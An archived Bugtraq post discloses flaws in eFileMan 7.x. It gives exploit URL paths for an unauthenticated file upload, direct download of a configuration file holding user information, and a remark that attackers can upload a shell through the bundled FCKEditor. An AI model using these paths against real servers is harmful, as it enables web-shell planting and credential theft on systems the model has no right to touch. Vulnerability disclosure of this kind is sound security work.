Home page logo
/

bugtraq logo Bugtraq mailing list archives

[Vulz] eFileMan 7.x Multiple Vulnerabilities by Xcross87
From: pete.houston.17187 () gmail com
Date: 23 Oct 2007 17:26:33 -0000

Software : eFileman
Version : 7.x (tested on 7.1.0.87-88)
Found by : Xcross87

A. Remote File Upload Vulnerability :

Xploit :

http://victim.com/[path]/upload.html
http://victim.com/[path]/cgi-bin/efileman/upload.cgi

The uploaded files are stored in :
http://victim.com/[path]/uploads/upload_file.xxx

B. Direct Access or Download Configuration File
Xploit :
http://victim.com/[path]/cgi-bin/efileman/efileman_config.pm <-- check user information

C. FCKEditor Inclusion.
For full pack of eFileman installation including FCKEditor, attacker can up shell through upload vulnerability of FCK

=== Xcross87 | HCETeam Xploiter ===


  By Date           By Thread  

Current thread:
  • [Vulz] eFileMan 7.x Multiple Vulnerabilities by Xcross87 pete . houston . 17187 (Oct 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault